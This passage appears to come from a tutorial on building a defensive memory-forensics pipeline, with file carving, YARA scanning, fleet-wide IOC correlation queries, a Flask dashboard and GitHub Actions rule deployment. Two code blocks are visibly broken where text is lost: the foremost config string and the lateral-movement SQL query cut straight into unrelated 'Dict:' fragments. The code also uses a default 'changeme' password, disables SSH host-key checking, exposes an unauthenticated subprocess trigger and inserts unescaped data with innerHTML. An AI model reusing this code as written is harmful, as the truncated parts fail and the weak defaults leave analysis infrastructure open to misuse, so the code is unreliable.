This recovers files that were loaded into memory and may no longer be accessible through normal OS structures: documents opened and closed before the image was taken, executables that were loaded and unmapped, scripts that ran entirely in memory, and configuration files that were decrypted and used.<\/p>\n<pre>## Automated memory carving pipeline stage\n## Integrates with the main Celery pipeline\n\n#!\/usr\/bin\/env python3\n\"\"\"\nMemory carving using bulk_extractor and foremost against memory images.\nFocuses on security-relevant carving: executables, scripts, documents, certificates.\n\"\"\"\n\nimport subprocess\nimport shutil\nimport json\nimport logging\nfrom pathlib import Path\nfrom typing import List, Dict\n\nlog = logging.getLogger(__name__)\n\n# File types to carve - focused on security-relevant artefacts\nFOREMOST_CONFIG = \"\"\"\n# Foremost config for memory forensics\n# Focus on executable and document types\n\n# Windows executables\nexe y 4000000 \\x4d\\x5a\n\n# DLL files (same signature as exe but worth carving separately)\ndll y 4000000 \\x4d\\x5a\n\n# PowerShell scripts (XML-based)\nps1 y 100000  Dict:\n    \"\"\"Run bulk_extractor and foremost against a memory image.\"\"\"\n\n    output_path = Path(output_dir) \/ f'carved_{image_id}'\n    output_path.mkdir(parents=True, exist_ok=True)\n\n    results = {\n        'image_id':        image_id,\n        'carved_files':    {},\n        'bulk_extractor':  {},\n        'interesting':     [],\n    }\n\n    # \u2500\u2500 bulk_extractor: extracts structured data \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    # Much faster than foremost for structured extraction\n    bulk_out = output_path \/ 'bulk_extractor'\n    bulk_out.mkdir(exist_ok=True)\n\n    log.info(f\"Running bulk_extractor on image {image_id}\")\n    result = subprocess.run([\n        'bulk_extractor',\n    
    '-o', str(bulk_out),\n        # Scanners relevant to security investigations. bulk_extractor has no\n        # separate url, domain or ip scanners: url.txt and domain.txt are\n        # produced by the email scanner, ip.txt by the net scanner.\n        '-e', 'email',      # Email addresses, domain names and URLs\n        '-e', 'base64',     # Base64 encoded data\n        '-e', 'net',        # Network packets and IP addresses\n        '-e', 'winpe',      # Windows PE files\n        '-e', 'pdf',        # PDF documents\n        '-e', 'zip',        # ZIP\/Office archives\n        '-e', 'json',       # JSON data (configs, beacons)\n        image_path\n    ], capture_output=True, text=True, timeout=3600)\n\n    if result.returncode == 0:\n        # Parse bulk_extractor output files\n        for feat_file in bulk_out.glob('*.txt'):\n            if feat_file.stat().st_size == 0:\n                continue\n            feature_name = feat_file.stem\n            lines = feat_file.read_text(errors='replace').splitlines()\n            # Filter comment lines\n            entries = [l for l in lines if l and not l.startswith('#')]\n            results['bulk_extractor'][feature_name] = len(entries)\n\n            # Flag high-value findings\n            if feature_name == 'url' and entries:\n                for entry in entries[:100]:  # First 100 URLs\n                    parts = entry.split('\\t')\n                    if len(parts) &gt;= 2:\n                        url = parts[1]\n                        # Flag non-Microsoft, non-CDN URLs\n                        if url.startswith('http') and not any(\n                            d in url for d in [\n                                'microsoft.com', 'windows.com', 'google.com',\n                                'cloudflare.com', 'akamai.com'\n                            ]\n                        ):\n                            results['interesting'].append({\n                                'type':   'url',\n                                'value':  url,\n                                'source': 
'bulk_extractor'\n                            })\n\n    # \u2500\u2500 foremost: carves file signatures \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    foremost_out = output_path \/ 'foremost'\n    foremost_out.mkdir(exist_ok=True)\n\n    # Write custom config\n    config_file = output_path \/ 'foremost.conf'\n    config_file.write_text(FOREMOST_CONFIG)\n\n    log.info(f\"Running foremost on image {image_id}\")\n    result = subprocess.run([\n        'foremost',\n        '-c', str(config_file),\n        '-o', str(foremost_out),\n        '-i', image_path,\n        '-Q'  # quiet mode (lowercase -q is quick mode, which only searches 512-byte boundaries)\n    ], capture_output=True, text=True, timeout=3600)\n\n    # Count carved files by type\n    for type_dir in foremost_out.iterdir():\n        if type_dir.is_dir() and type_dir.name != 'audit.txt':\n            file_list = list(type_dir.glob('*'))\n            count = len(file_list)\n            results['carved_files'][type_dir.name] = count\n\n            # Flag carved PE files for Yara scanning\n            if type_dir.name in ('exe', 'dll') and count &gt; 0:\n                results['interesting'].append({\n                    'type':   'carved_pe',\n                    'value':  f\"{count} PE files carved from memory\",\n                    'path':   str(type_dir),\n                    'source': 'foremost'\n                })\n\n    log.info(f\"Carving complete for image {image_id}: \"\n             f\"{sum(results['carved_files'].values())} files carved\")\n\n    return results\n\ndef scan_carved_pes(carved_dir: str, yara_rules_path: str) -&gt; List[Dict]:\n    \"\"\"Run Yara against carved PE files to identify malware families.\"\"\"\n    import yara\n\n    if not Path(yara_rules_path).exists():\n        log.warning(\"Yara rules not found - skipping carved PE scan\")\n        return []\n\n    rules   = 
yara.load(yara_rules_path)\n    matches = []\n\n    # foremost writes .exe and .dll carves to separate directories; scan both\n    carved_pes = [p for p in Path(carved_dir).rglob('*')\n                  if p.suffix.lower() in ('.exe', '.dll')]\n    for pe_file in carved_pes:\n        try:\n            hits = rules.match(str(pe_file))\n            if hits:\n                matches.append({\n                    'file':  str(pe_file),\n                    'rules': [h.rule for h in hits],\n                    'size':  pe_file.stat().st_size\n                })\n                log.warning(f\"YARA HIT in carved file: {pe_file.name} -&gt; {[h.rule for h in hits]}\")\n        except Exception as e:\n            log.debug(f\"Yara scan failed for {pe_file}: {e}\")\n\n    return matches<\/pre>\n<h3>Cross-image IOC correlation: finding attacker infrastructure across the fleet<\/h3>\n<p>Individual memory image analysis tells you what is happening on one machine. Cross-image correlation shows how far an intrusion extends: which machines have seen the same C2 IP, which machines have the same injected code hash, which machines ran the same attacker tool at approximately the same time. 
This is where the PostgreSQL backend pays off: all analysis results from all images are in the same database, queryable together.<\/p>\n<pre>## cross_correlation.py - Fleet-wide IOC correlation analysis\n\n#!\/usr\/bin\/env python3\n\"\"\"\nCross-image correlation engine.\nFinds common IOCs, processes, and artefacts across all analysed memory images.\nProduces a fleet-wide threat assessment showing attacker scope and pivot points.\n\"\"\"\n\nimport os\nimport psycopg2\nimport json\nimport logging\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import List, Dict, Tuple\nfrom collections import defaultdict\n\nlog = logging.getLogger(__name__)\n# Override with the POSTGRES_URL environment variable\nPOSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql:\/\/analyst:changeme@localhost\/memory_analysis')\n\ndef get_db():\n    return psycopg2.connect(POSTGRES_URL)\n\ndef correlate_external_ips() -&gt; List[Dict]:\n    \"\"\"Find external IP addresses seen in multiple memory images.\"\"\"\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT\n                    nc.remote_addr,\n                    nc.remote_port,\n                    COUNT(DISTINCT nc.image_id) AS host_count,\n                    ARRAY_AGG(DISTINCT mi.hostname ORDER BY mi.hostname) AS hostnames,\n                    ARRAY_AGG(DISTINCT nc.process_name) AS processes\n                FROM network_connections nc\n                JOIN memory_images mi ON mi.id = nc.image_id\n                WHERE\n                    nc.remote_addr != ''\n                    AND nc.remote_addr != '0.0.0.0'\n                    AND nc.remote_addr NOT LIKE '10.%'\n                    -- 172.16.0.0\/12 spans 172.16.x.x through 172.31.x.x\n                    AND nc.remote_addr !~ '^172[.](1[6-9]|2[0-9]|3[01])[.]'\n                    AND nc.remote_addr NOT LIKE '192.168.%'\n                    AND nc.remote_addr NOT LIKE '127.%'\n                    AND mi.status = 'complete'\n                GROUP BY nc.remote_addr, nc.remote_port\n                HAVING COUNT(DISTINCT nc.image_id) &gt;= 2\n                ORDER BY host_count 
DESC, nc.remote_addr\n            \"\"\")\n            rows = cur.fetchall()\n\n    results = []\n    for row in rows:\n        results.append({\n            'remote_ip':    row[0],\n            'remote_port':  row[1],\n            'host_count':   row[2],\n            'hostnames':    row[3],\n            'processes':    row[4],\n            'severity':     'CRITICAL' if row[2] &gt;= 5 else 'HIGH' if row[2] &gt;= 2 else 'MEDIUM',\n        })\n\n    return results\n\ndef correlate_malfind_patterns() -&gt; List[Dict]:\n    \"\"\"Find memory injection patterns seen across multiple hosts.\"\"\"\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT\n                    mf.protection,\n                    mf.has_pe_header,\n                    mf.risk_level,\n                    COUNT(DISTINCT mf.image_id) AS host_count,\n                    ARRAY_AGG(DISTINCT mi.hostname) AS hostnames,\n                    ARRAY_AGG(DISTINCT mf.process_name) AS processes,\n                    AVG(mf.entropy) AS avg_entropy\n                FROM malfind_results mf\n                JOIN memory_images mi ON mi.id = mf.image_id\n                WHERE mi.status = 'complete'\n                GROUP BY mf.protection, mf.has_pe_header, mf.risk_level\n                HAVING COUNT(DISTINCT mf.image_id) &gt;= 2\n                ORDER BY host_count DESC\n            \"\"\")\n            rows = cur.fetchall()\n\n    results = []\n    for row in rows:\n        results.append({\n            'protection':   row[0],\n            'has_pe_header':row[1],\n            'risk_level':   row[2],\n            'host_count':   row[3],\n            'hostnames':    row[4],\n            'processes':    row[5],\n            'avg_entropy':  float(row[6]) if row[6] else 0,\n        })\n    return results\n\ndef correlate_iocs() -&gt; List[Dict]:\n    \"\"\"Find IOC values seen across multiple memory images.\"\"\"\n    with get_db() as conn:\n        with 
conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT\n                    ioc.ioc_type,\n                    ioc.ioc_value,\n                    COUNT(DISTINCT ioc.image_id) AS host_count,\n                    ARRAY_AGG(DISTINCT mi.hostname) AS hostnames,\n                    ARRAY_AGG(DISTINCT ioc.process_name) AS processes,\n                    MIN(mi.acquired_at) AS first_seen,\n                    MAX(mi.acquired_at) AS last_seen\n                FROM iocs_extracted ioc\n                JOIN memory_images mi ON mi.id = ioc.image_id\n                WHERE mi.status = 'complete'\n                GROUP BY ioc.ioc_type, ioc.ioc_value\n                HAVING COUNT(DISTINCT ioc.image_id) &gt;= 2\n                ORDER BY host_count DESC, ioc.ioc_type\n            \"\"\")\n            rows = cur.fetchall()\n\n    results = []\n    for row in rows:\n        results.append({\n            'ioc_type':   row[0],\n            'ioc_value':  row[1],\n            'host_count': row[2],\n            'hostnames':  row[3],\n            'processes':  row[4],\n            'first_seen': str(row[5]),\n            'last_seen':  str(row[6]),\n        })\n    return results\n\ndef find_lateral_movement_timeline() -&gt; List[Dict]:\n    \"\"\"\n    Attempt to reconstruct lateral movement by correlating\n    process creation times across hosts.\n    Looks for the same attacker tool running on multiple hosts\n    within a short time window.\n    \"\"\"\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                WITH suspicious AS (\n                    SELECT\n                        pl.name,\n                        pl.create_time,\n                        mi.hostname,\n                        pl.pid,\n                        pl.cmd_line\n                    FROM process_list pl\n                    JOIN memory_images mi ON mi.id = pl.image_id\n                    WHERE pl.is_suspicious = TRUE\n                   
   AND pl.create_time IS NOT NULL\n                )\n                SELECT\n                    s1.name,\n                    s1.hostname AS first_host,\n                    s1.create_time AS first_time,\n                    s2.hostname AS second_host,\n                    s2.create_time AS second_time,\n                    EXTRACT(EPOCH FROM (s2.create_time - s1.create_time))\/60 AS minutes_between\n                FROM suspicious s1\n                JOIN suspicious s2 ON\n                    s1.name = s2.name\n                    AND s1.hostname != s2.hostname\n                    AND s2.create_time &gt; s1.create_time\n                    AND s2.create_time - s1.create_time  Dict:\n    \"\"\"Generate the complete fleet-wide correlation report.\"\"\"\n    log.info(\"Running fleet-wide cross-image correlation\")\n\n    # Count completed images\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT\n                    COUNT(*) AS total,\n                    SUM(CASE WHEN status='complete' THEN 1 ELSE 0 END) AS complete,\n                    SUM(CASE WHEN status LIKE '%running%' THEN 1 ELSE 0 END) AS running,\n                    SUM(CASE WHEN status LIKE '%failed%' THEN 1 ELSE 0 END) AS failed,\n                    SUM(CASE WHEN risk_score &gt;= 50 THEN 1 ELSE 0 END) AS critical_hosts\n                FROM memory_images mi\n                LEFT JOIN triage_results tr ON tr.image_id = mi.id\n            \"\"\")\n            fleet_stats = cur.fetchone()\n\n    shared_ips      = correlate_external_ips()\n    shared_malfind  = correlate_malfind_patterns()\n    shared_iocs     = correlate_iocs()\n    lateral_mv      = find_lateral_movement_timeline()\n\n    # Calculate overall threat level\n    critical_count = sum(1 for ip in shared_ips if ip['severity'] == 'CRITICAL')\n    overall_threat = (\n        'CRITICAL' if critical_count &gt; 0 or fleet_stats[4] &gt; 3 else\n        'HIGH'     if 
len(shared_ips) &gt; 0 or fleet_stats[4] &gt; 0 else\n        'MEDIUM'   if len(shared_iocs) &gt; 0 else\n        'LOW'\n    )\n\n    report = {\n        'generated_at':       datetime.now().isoformat(),\n        'overall_threat':     overall_threat,\n        'fleet_stats': {\n            'total_images':       fleet_stats[0],\n            'complete':           fleet_stats[1],\n            'processing':         fleet_stats[2],\n            'failed':             fleet_stats[3],\n            'critical_hosts':     fleet_stats[4],\n        },\n        'shared_c2_ips':          shared_ips,\n        'shared_injection_patterns': shared_malfind,\n        'shared_iocs':            shared_iocs,\n        'lateral_movement_indicators': lateral_mv,\n        'summary': (\n            f\"Fleet analysis of {fleet_stats[0]} endpoints. \"\n            f\"Overall threat level: {overall_threat}. \"\n            f\"{len(shared_ips)} shared external IP(s), \"\n            f\"{fleet_stats[4]} critical host(s), \"\n            f\"{len(lateral_mv)} potential lateral movement indicator(s).\"\n        )\n    }\n\n    # Save report (create the reports directory on first run)\n    report_path = Path('\/srv\/memory\/reports\/fleet_correlation.json')\n    report_path.parent.mkdir(parents=True, exist_ok=True)\n    with open(report_path, 'w') as f:\n        json.dump(report, f, indent=2, default=str)\n\n    log.info(f\"Fleet report saved to {report_path}\")\n    log.info(f\"Overall threat level: {overall_threat}\")\n\n    if shared_ips:\n        # Shared external IPs are C2 candidates, not confirmed C2: review each one\n        log.warning(f\"SHARED EXTERNAL IPs: {len(shared_ips)} IP(s) seen on 2+ hosts:\")\n        for ip in shared_ips[:5]:\n            log.warning(f\"  {ip['remote_ip']}:{ip['remote_port']} on {ip['host_count']} hosts: {ip['hostnames']}\")\n\n    return report\n\nif __name__ == '__main__':\n    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(message)s')\n    report = generate_fleet_report()\n    print(json.dumps(report, indent=2, default=str))<\/pre>\n<h3>The analyst dashboard<\/h3>\n<p>Raw pipeline output in a PostgreSQL database and JSON 
files is not usable under incident pressure. Analysts need a single view that shows which images are processing, which have completed, which have high-risk findings, and the cross-image correlation results. A lightweight Flask dashboard served by the Docker Compose stack provides this without requiring a full SIEM deployment.<\/p>\n<pre>## dashboard\/app.py - Flask analyst dashboard\n\nfrom flask import Flask, render_template, jsonify, request\nimport psycopg2\nimport psycopg2.extras\nimport json\nimport os\nfrom datetime import datetime\n\napp = Flask(__name__)\nPOSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql:\/\/analyst:changeme@localhost\/memory_analysis')\n\ndef get_db():\n    conn = psycopg2.connect(POSTGRES_URL, cursor_factory=psycopg2.extras.RealDictCursor)\n    return conn\n\n@app.route('\/')\ndef index():\n    return render_template('dashboard.html')\n\n@app.route('\/api\/fleet-status')\ndef fleet_status():\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT\n                    mi.id, mi.hostname, mi.status, mi.tier,\n                    mi.image_size_gb, mi.received_at, mi.sha256,\n                    tr.risk_score, tr.suspicious_process_count,\n                    tr.has_malfind, tr.network_conn_count,\n                    CASE\n                        WHEN tr.risk_score &gt;= 50 THEN 'CRITICAL'\n                        WHEN tr.risk_score &gt;= 20 THEN 'HIGH'\n                        WHEN tr.risk_score &gt;= 5  THEN 'MEDIUM'\n                        ELSE 'LOW'\n                    END AS risk_label\n                FROM memory_images mi\n                LEFT JOIN triage_results tr ON tr.image_id = mi.id\n                ORDER BY tr.risk_score DESC NULLS LAST, mi.received_at DESC\n            \"\"\")\n            rows = cur.fetchall()\n    return jsonify([dict(r) for r in rows])\n\n# The &lt;int:image_id&gt; URL converter passes the image ID to host_detail()\n@app.route('\/api\/host\/&lt;int:image_id&gt;')\ndef host_detail(image_id):\n    with get_db() as conn:\n        with 
conn.cursor() as cur:\n            # Suspicious processes\n            cur.execute(\"\"\"\n                SELECT pid, ppid, name, path, cmd_line, suspicious_reason\n                FROM process_list\n                WHERE image_id = %s AND is_suspicious = TRUE\n                ORDER BY pid\n            \"\"\", (image_id,))\n            suspicious_procs = [dict(r) for r in cur.fetchall()]\n\n            # Malfind regions\n            cur.execute(\"\"\"\n                SELECT pid, process_name, protection, has_pe_header,\n                       entropy, risk_level, yara_matches\n                FROM malfind_results\n                WHERE image_id = %s\n                ORDER BY risk_level, entropy DESC\n            \"\"\", (image_id,))\n            malfind = [dict(r) for r in cur.fetchall()]\n\n            # Network connections\n            cur.execute(\"\"\"\n                SELECT pid, process_name, remote_addr, remote_port, state, is_suspicious\n                FROM network_connections\n                WHERE image_id = %s AND remote_addr != '' AND remote_addr != '0.0.0.0'\n                ORDER BY is_suspicious DESC, remote_port\n            \"\"\", (image_id,))\n            connections = [dict(r) for r in cur.fetchall()]\n\n            # IOCs\n            cur.execute(\"\"\"\n                SELECT ioc_type, ioc_value, process_name, confidence\n                FROM iocs_extracted\n                WHERE image_id = %s\n                ORDER BY ioc_type\n            \"\"\", (image_id,))\n            iocs = [dict(r) for r in cur.fetchall()]\n\n    return jsonify({\n        'suspicious_processes': suspicious_procs,\n        'malfind_regions':      malfind,\n        'network_connections':  connections,\n        'iocs':                 iocs,\n    })\n\n@app.route('\/api\/fleet-correlation')\ndef fleet_correlation():\n    \"\"\"Return cross-image correlation results.\"\"\"\n    report_path = '\/srv\/memory\/reports\/fleet_correlation.json'\n    try:\n        with 
open(report_path) as f:\n            return jsonify(json.load(f))\n    except FileNotFoundError:\n        return jsonify({'error': 'Correlation report not yet generated'}), 404\n\n@app.route('\/api\/trigger-correlation', methods=['POST'])\ndef trigger_correlation():\n    \"\"\"Manually trigger fleet correlation analysis.\"\"\"\n    import subprocess\n    subprocess.Popen(['python3', '\/srv\/memory\/cross_correlation.py'])\n    return jsonify({'status': 'triggered'})\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=8080, debug=False)<\/pre>\n<pre>## dashboard\/templates\/dashboard.html - Single-page analyst interface\n\n&lt;!DOCTYPE html&gt;\n&lt;html lang=\"en\"&gt;\n&lt;head&gt;\n&lt;meta charset=\"UTF-8\"&gt;\n&lt;meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"&gt;\n&lt;title&gt;Memory Analysis Dashboard&lt;\/title&gt;\n&lt;style&gt;\n  * { box-sizing: border-box; margin: 0; padding: 0; }\n  body { font-family: 'JetBrains Mono', monospace; background: #0f172a; color: #e2e8f0; font-size: 13px; }\n  .header { background: #1e2433; padding: 16px 24px; border-bottom: 1px solid #334155; display: flex; align-items: center; gap: 16px; }\n  .header h1 { font-size: 16px; color: #f59e0b; }\n  .stats { display: flex; gap: 12px; margin-left: auto; }\n  .stat { background: #0f172a; padding: 6px 14px; border-radius: 6px; text-align: center; }\n  .stat-val { font-size: 18px; font-weight: 700; }\n  .stat-lbl { font-size: 9px; color: #64748b; text-transform: uppercase; letter-spacing: 0.1em; }\n  .critical { color: #ef4444; } .high { color: #f97316; }\n  .medium { color: #eab308; } .low { color: #22c55e; }\n  .container { padding: 20px 24px; }\n  table { width: 100%; border-collapse: collapse; }\n  th { text-align: left; padding: 8px 12px; font-size: 9px; color: #64748b; text-transform: uppercase; letter-spacing: 0.1em; border-bottom: 1px solid #1e293b; }\n  td { padding: 10px 12px; border-bottom: 1px solid #1e293b; }\n  tr:hover { 
background: #1e293b; cursor: pointer; }\n  .badge { display: inline-block; padding: 2px 8px; border-radius: 3px; font-size: 9px; font-weight: 600; }\n  .badge-critical { background: #450a0a; color: #ef4444; border: 1px solid #ef4444; }\n  .badge-high     { background: #431407; color: #f97316; border: 1px solid #f97316; }\n  .badge-medium   { background: #422006; color: #eab308; border: 1px solid #eab308; }\n  .badge-low      { background: #052e16; color: #22c55e; border: 1px solid #22c55e; }\n  .status-pill { background: #1e293b; padding: 2px 8px; border-radius: 10px; font-size: 10px; }\n  .btn { background: #1e293b; border: 1px solid #334155; color: #94a3b8; padding: 6px 14px; border-radius: 6px; cursor: pointer; font-family: monospace; font-size: 11px; }\n  .btn:hover { border-color: #f59e0b; color: #f59e0b; }\n&lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;div class=\"header\"&gt;\n  &lt;h1&gt;Memory Analysis Pipeline&lt;\/h1&gt;\n  &lt;div class=\"stats\"&gt;\n    &lt;div class=\"stat\"&gt;&lt;div class=\"stat-val\" id=\"total-count\"&gt;-&lt;\/div&gt;&lt;div class=\"stat-lbl\"&gt;Total&lt;\/div&gt;&lt;\/div&gt;\n    &lt;div class=\"stat\"&gt;&lt;div class=\"stat-val critical\" id=\"critical-count\"&gt;-&lt;\/div&gt;&lt;div class=\"stat-lbl\"&gt;Critical&lt;\/div&gt;&lt;\/div&gt;\n    &lt;div class=\"stat\"&gt;&lt;div class=\"stat-val high\" id=\"complete-count\"&gt;-&lt;\/div&gt;&lt;div class=\"stat-lbl\"&gt;Complete&lt;\/div&gt;&lt;\/div&gt;\n  &lt;\/div&gt;\n  &lt;button class=\"btn\" onclick=\"triggerCorrelation()\"&gt;Run Correlation&lt;\/button&gt;\n  &lt;button class=\"btn\" onclick=\"loadData()\"&gt;Refresh&lt;\/button&gt;\n&lt;\/div&gt;\n&lt;div class=\"container\"&gt;\n  &lt;table&gt;\n    &lt;thead&gt;&lt;tr&gt;\n      &lt;th&gt;Host&lt;\/th&gt;&lt;th&gt;Tier&lt;\/th&gt;&lt;th&gt;Risk&lt;\/th&gt;\n      &lt;th&gt;Status&lt;\/th&gt;&lt;th&gt;Size&lt;\/th&gt;&lt;th&gt;Suspicious Procs&lt;\/th&gt;\n      
&lt;th&gt;Malfind&lt;\/th&gt;&lt;th&gt;Connections&lt;\/th&gt;\n    &lt;\/tr&gt;&lt;\/thead&gt;\n    &lt;tbody id=\"host-table\"&gt;&lt;\/tbody&gt;\n  &lt;\/table&gt;\n&lt;\/div&gt;\n&lt;script&gt;\nasync function loadData() {\n  const data = await fetch('\/api\/fleet-status').then(r =&gt; r.json());\n  document.getElementById('total-count').textContent = data.length;\n  document.getElementById('critical-count').textContent = data.filter(h =&gt; h.risk_label === 'CRITICAL').length;\n  document.getElementById('complete-count').textContent = data.filter(h =&gt; h.status === 'complete').length;\n\n  \/\/ Number() also handles NUMERIC columns, which Flask serialises as strings\n  const tbody = document.getElementById('host-table');\n  tbody.innerHTML = data.map(h =&gt; `\n    &lt;tr onclick=\"window.open('\/api\/host\/${h.id}','_blank')\"&gt;\n      &lt;td style=\"font-weight:600\"&gt;${h.hostname}&lt;\/td&gt;\n      &lt;td&gt;T${h.tier || '-'}&lt;\/td&gt;\n      &lt;td&gt;&lt;span class=\"badge badge-${(h.risk_label||'low').toLowerCase()}\"&gt;${h.risk_label || 'N\/A'}&lt;\/span&gt;&lt;\/td&gt;\n      &lt;td&gt;&lt;span class=\"status-pill\"&gt;${h.status}&lt;\/span&gt;&lt;\/td&gt;\n      &lt;td&gt;${h.image_size_gb ? Number(h.image_size_gb).toFixed(1) + ' GB' : '-'}&lt;\/td&gt;\n      &lt;td style=\"color:${h.suspicious_process_count &gt; 0 ? '#f97316' : '#64748b'}\"&gt;${h.suspicious_process_count || 0}&lt;\/td&gt;\n      &lt;td style=\"color:${h.has_malfind ? '#ef4444' : '#64748b'}\"&gt;${h.has_malfind ? 'YES' : 'no'}&lt;\/td&gt;\n      &lt;td&gt;${h.network_conn_count || 0}&lt;\/td&gt;\n    &lt;\/tr&gt;\n  `).join('');\n}\n\nasync function triggerCorrelation() {\n  await fetch('\/api\/trigger-correlation', {method: 'POST'});\n  alert('Correlation analysis triggered. 
Refresh in 60 seconds.');\n}\n\nloadData();\nsetInterval(loadData, 30000);\n&lt;\/script&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/pre>\n<h3>The CI\/CD pipeline: GitHub Actions for automated ruleset deployment<\/h3>\n<p>The Yara ruleset, pipeline configuration, and correlation scripts need to be version-controlled and deployed automatically when they change. A GitHub Actions workflow handles this. When a Yara rule (or the pipeline code) changes on the main branch, the workflow compiles the full ruleset, tests it against clean samples, and deploys the compiled ruleset to the analysis server. This keeps detection current without manual SSH sessions.<\/p>\n<pre>## .github\/workflows\/deploy_rules.yml\n## Triggered on push to main branch when Yara rules change\n\nname: Compile and Deploy Yara Rules\n\non:\n  push:\n    branches: [main]\n    paths:\n      - 'yara_rules\/**'\n      - 'pipeline\/**'\n      - 'requirements.txt'\n\njobs:\n  compile-and-test:\n    runs-on: ubuntu-latest\n    steps:\n      - name: Checkout repository\n        uses: actions\/checkout@v4\n\n      - name: Set up Python\n        uses: actions\/setup-python@v5\n        with:\n          python-version: '3.11'\n\n      - name: Install dependencies\n        run: |\n          pip install yara-python pefile\n          sudo apt-get update\n          sudo apt-get install -y yara\n\n      - name: Lint Yara rules individually\n        run: |\n          echo \"Checking individual rule files...\"\n          ERRORS=0\n          for rule_file in yara_rules\/rules\/*.yar; do\n            if ! 
yara \"$rule_file\" \/dev\/null &gt;\/dev\/null; then\n              echo \"SYNTAX ERROR: $rule_file\"\n              ERRORS=$((ERRORS + 1))\n            else\n              echo \"OK: $rule_file\"\n            fi\n          done\n          if [ $ERRORS -gt 0 ]; then\n            echo \"Found $ERRORS rule file(s) with errors\"\n            exit 1\n          fi\n\n      - name: Compile combined ruleset\n        run: |\n          # compile_rules.py reads RULES_DIR and writes COMPILED_OUT, which are set to\n          # \/srv\/memory paths; on the runner, point them at the checkout\n          # (yara_rules\/rules and yara_rules\/combined.yar) so later steps find the output\n          python3 pipeline\/compile_rules.py\n          echo \"Compiled ruleset size: $(du -sh yara_rules\/combined.yar)\"\n\n      - name: Test for false positives\n        run: |\n          # Smoke test against binaries already present on the runner. These are Linux\n          # ELF files, so they only catch over-broad string rules; in production,\n          # maintain a curated set of known-clean Windows samples instead\n          echo \"Running false positive checks...\"\n          python3 -c \"\n          import yara, os\n          # combined.yar is a saved (compiled) ruleset, so load it rather than compile it\n          rules = yara.load('yara_rules\/combined.yar')\n          clean_bins = ['\/bin\/ls', '\/bin\/cat', '\/usr\/bin\/python3']\n          fps = 0\n          for f in clean_bins:\n              if os.path.exists(f):\n                  matches = rules.match(f)\n                  if matches:\n                      print(f'FP: {f} matched {[m.rule for m in matches]}')\n                      fps += 1\n          print(f'False positive check: {fps} hits in clean files')\n          exit(fps &gt; 2)\n          \"\n\n      - name: Upload compiled ruleset artifact\n        uses: actions\/upload-artifact@v4\n        with:\n          name: compiled-yara-rules\n          path: yara_rules\/combined.yar\n          retention-days: 30\n\n  deploy:\n    needs: compile-and-test\n    runs-on: ubuntu-latest\n    if: github.ref == 'refs\/heads\/main'\n    environment: production\n    steps:\n      - name: Download compiled ruleset\n        uses: actions\/download-artifact@v4\n        with:\n          name: compiled-yara-rules\n\n      - name: Deploy to analysis server\n        env:\n          DEPLOY_KEY: ${{ 
secrets.ANALYSIS_SERVER_DEPLOY_KEY }}\n          ANALYSIS_SERVER: ${{ secrets.ANALYSIS_SERVER_HOST }}\n        run: |\n          echo \"$DEPLOY_KEY\" &gt; \/tmp\/deploy_key\n          chmod 600 \/tmp\/deploy_key\n\n          # Copy compiled rules to analysis server\n          scp -i \/tmp\/deploy_key -o StrictHostKeyChecking=no \\\n              combined.yar \\\n              analyst@$ANALYSIS_SERVER:\/srv\/memory\/yara_rules\/combined.yar\n\n          # Verify the ruleset landed on the analysis server\n          ssh -i \/tmp\/deploy_key -o StrictHostKeyChecking=no \\\n              analyst@$ANALYSIS_SERVER \\\n              'ls -lh \/srv\/memory\/yara_rules\/combined.yar &amp;&amp; echo \"Deployment verified\"'\n\n          rm \/tmp\/deploy_key\n\n      - name: Report deployment status\n        if: always()\n        run: |\n          echo \"Yara rule deployment finished with status ${{ job.status }} at $(date -u)\"<\/pre>\n<pre>## .github\/workflows\/pipeline_tests.yml\n## Integration tests for the processing pipeline\n\nname: Pipeline Integration Tests\n\non:\n  push:\n    paths:\n      - 'pipeline\/**'\n  pull_request:\n    paths:\n      - 'pipeline\/**'\n\njobs:\n  test-pipeline:\n    runs-on: ubuntu-latest\n    services:\n      redis:\n        image: redis:7-alpine\n        ports:\n          - 6379:6379\n      postgres:\n        image: postgres:15-alpine\n        env:\n          POSTGRES_DB:       memory_analysis\n          POSTGRES_USER:     analyst\n          POSTGRES_PASSWORD: testpassword\n        ports:\n          - 5432:5432\n        options: --health-cmd pg_isready --health-interval 10s\n\n    steps:\n      - uses: actions\/checkout@v4\n\n      - name: Set up Python\n        uses: actions\/setup-python@v5\n        with:\n          python-version: '3.11'\n\n      - name: Install dependencies\n        run: |\n          pip install -r requirements.txt\n          pip install pytest pytest-asyncio\n\n      - name: Initialize test database\n        env:\n          PGPASSWORD: testpassword\n        
